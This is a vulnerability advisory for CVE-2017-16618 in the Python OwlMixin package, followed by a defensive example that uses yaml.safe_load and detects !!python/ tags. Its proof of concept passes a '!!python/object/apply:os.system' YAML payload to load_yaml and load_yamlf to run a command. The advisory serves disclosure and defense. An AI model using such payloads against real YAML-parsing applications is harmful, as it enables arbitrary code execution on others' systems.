CVE-2017-16618: Convert Through OwlMixin

Python Package: OwlMixin

Version: Before 2.0.0a12

Published: Nov. 7th, 2017

Reported by: Joel

CVE-2017-16618 (CVE details)

Overview

OwlMixin is a library which converts data class instances and other representations into each other. Recently, an issue was discovered in the owlmixin package before 2.0.0a12. Untrusted data passed into the load_yaml() and load_yamlf() functions can execute arbitrary Python commands, resulting in command execution.

PoC

from owlmixin import util

# Inline YAML carrying a Python-specific tag; the loader used before
# 2.0.0a12 resolves it instead of rejecting it.
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')

# Same payload read from a file; 'joel.yml' contains the single line:
# !!python/object/apply:os.system ["calc.exe"]
util.load_yamlf('joel.yml', 'utf-8')

PoC video

Remediation

The updated version of OwlMixin (2.0.0a12) correctly uses the yaml.safe_load method, which prevents remote code execution.
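The following is an added example for this advisory, not code from the OwlMixin project. It shows why the remediation works: yaml.safe_load only constructs plain data and refuses the !!python/ tag family with a ConstructorError, whereas a full loader would turn the same tag into object construction. It also adds a text-level pre-flight check that flags such tags so a refusal can be logged before parsing. The sample documents, the function names and the regular expression are constructed for the example; the module assumes PyYAML is installed for the loading part and degrades to the pre-flight check alone when it is not.

```python
"""Defensive handling of untrusted YAML with PyYAML (added example)."""
import re

try:
    import yaml  # PyYAML; optional so the pre-flight check also runs without it
except ImportError:
    yaml = None

# Full PyYAML loaders resolve "!!python/..." tags into Python object
# construction (the mechanism behind the PoC). safe_load knows no such tags.
PYTHON_TAG_RE = re.compile(r"!!python/[A-Za-z0-9_/]+")

# Constructed samples: the first mirrors the shape of the advisory's payload,
# the second is ordinary configuration data.
TAGGED_PAYLOAD = '!!python/object/apply:os.system ["calc.exe"]'
PLAIN_DOCUMENT = "name: joel\nretries: 3\ntags: [a, b]\n"


def pyyaml_available():
    """True when PyYAML could be imported."""
    return yaml is not None


def find_python_tags(text):
    """Return every !!python/... tag in the document, for logging or alerting.

    This is a text-level check and deliberately conservative: it does not
    replace safe_load, it just makes the attempt visible before parsing.
    """
    return PYTHON_TAG_RE.findall(text)


def load_untrusted_yaml(text):
    """Parse YAML that came from an untrusted source.

    yaml.safe_load only constructs plain data (mappings, sequences, scalars).
    A !!python/ tag makes it raise ConstructorError instead of running code.
    Returns (True, data) on success or (False, exception class name) on refusal.
    """
    if yaml is None:
        raise RuntimeError("PyYAML is required for load_untrusted_yaml")
    try:
        return True, yaml.safe_load(text)
    except yaml.YAMLError as exc:  # ConstructorError is a YAMLError subclass
        return False, type(exc).__name__


if __name__ == "__main__":
    for doc in (PLAIN_DOCUMENT, TAGGED_PAYLOAD):
        tags = find_python_tags(doc)
        print("pre-flight tags:", tags or "none")
        if pyyaml_available():
            print("safe_load result:", load_untrusted_yaml(doc))
```

The pre-flight check is a detection aid, not the control: the control is that untrusted input never reaches a loader that understands !!python/ tags. Wrapping yaml.safe_load as above also gives a single place to log refused documents.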